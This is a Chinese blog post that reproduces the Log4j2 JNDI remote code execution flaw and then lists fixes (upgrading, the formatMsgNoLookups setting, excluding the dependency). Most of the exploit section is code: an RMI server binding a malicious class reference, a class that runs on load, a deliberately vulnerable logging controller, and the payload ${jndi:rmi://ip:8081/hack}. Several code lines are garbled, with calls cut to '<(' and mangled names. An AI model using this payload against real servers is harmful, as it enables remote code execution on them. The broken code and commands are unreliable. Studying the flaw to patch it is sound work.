Log4j漏洞及解决⽅案,亲测
先说⼀下漏洞,看代码吧(漏洞复现)
描述:
Apache Log4j2是⼀款优秀的Java⽇志框架。2021年11⽉24⽇,阿⾥云安全团队向Apache官⽅报告了Apache Log4j2远程代码执⾏漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执⾏漏洞。漏洞利⽤⽆需特殊配置,经阿⾥云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。2021年12⽉10⽇,阿⾥云安全团队发现 Apache Log4j 2.15.0-rc1 版本存在漏洞绕过,请及时更新⾄ Apache Log4j 2.15.0-rc2 版本。阿⾥云应急响应中⼼提醒Apache Log4j2 ⽤户尽快采取安全措施阻⽌漏洞攻击。
影响版本:
经验证 2.15.0-rc1 版本存在绕过,实际受影响范围如下:Apache Log4j 2.x < 2.15.0-rc2
public class HackService {
public static void main(String[] args){
try{
// 启动服务
Registry registry = Registry();
// 创建资源
Reference reference =new Reference("ample.log4jdemo.hei.HackTool","ample.log4jdemo.hei.HackTool",null);
ReferenceWrapper referenceWrapper =new ReferenceWrapper(reference);
// 绑定资源
registry.bind("hack", referenceWrapper);
System.out.println("服务初始化完成");
}catch(Exception e){
e.printStackTrace();
}
}
}
public class HackTool {
static{
System.out.println("先来⼀个 -> rm -rf /");
}
}
@RequestMapping("test")
@RestController
apachelog4j2漏洞
public class TestController {
private static final Logger logger = Logger(TestController.class);
@RequestMapping(value ="search")
public Object test(@RequestParam String str){
<("⼊参:{}",str);
return"OK";
}
public static void main(String[] args){
String str ="${jndi:rmi://ip:8081/hack}";//${jndi:rmi://ip:8081/hack}
<("⼊参:{}",str);
}
}
@SpringBootApplication
public class Log4jDemoApplication {
public static void main(String[] args){
SpringApplication.run(Log4jDemoApplication.class, args);
}
}
对应的pom⽂件
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>1.5.7.RELEASE</version>
<relativePath/><!-- lookup parent from repository -->
</parent>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<!--<dependency>
<groupId>org.projectlombok</groupId>
<artifactId>lombok</artifactId>
<version>1.18.16</version>
</dependency>-->
<!--升级到2.15.0就好了-->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.12.1</version>
<!--          <version>2.15.0</version>-->
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.12.1</version>
<!--            <version>2.15.0</version>-->
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
通过测试发现我们在使⽤2.0–>2.14版本的时候会出现漏洞,的时候会调这个接⼝jndi:rmi://ip:8081/hack
解决⽅案1(升级版本)
升级到2.15之后就不会调⽤了也就解决了这个漏洞
解决⽅案2 (临时⽅案)
JVM 参数添加 -Dlog4j2.formatMsgNoLookups=true
log4j2.formatMsgNoLookups=True
FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为true
具体操作如下:
1. nohup java -jar -Dlog4j
2.formatMsgNoLookups=true xxx.jar &
2. 在resources⽬录下新建⼀个log4j2ponent.properties⽂件⾥⾯放log4j2.formatMsgNoLookups=True即可
3. 在系统环境变量中添加
变量名:FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 变量值:true
解决⽅案3(排除log4j)
可以通过maven helper来排除掉log4j的依赖,因为有时候这些依赖并不是⾃⼰依赖进来的可能是您所依赖的的依赖⾥⾯的依赖

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。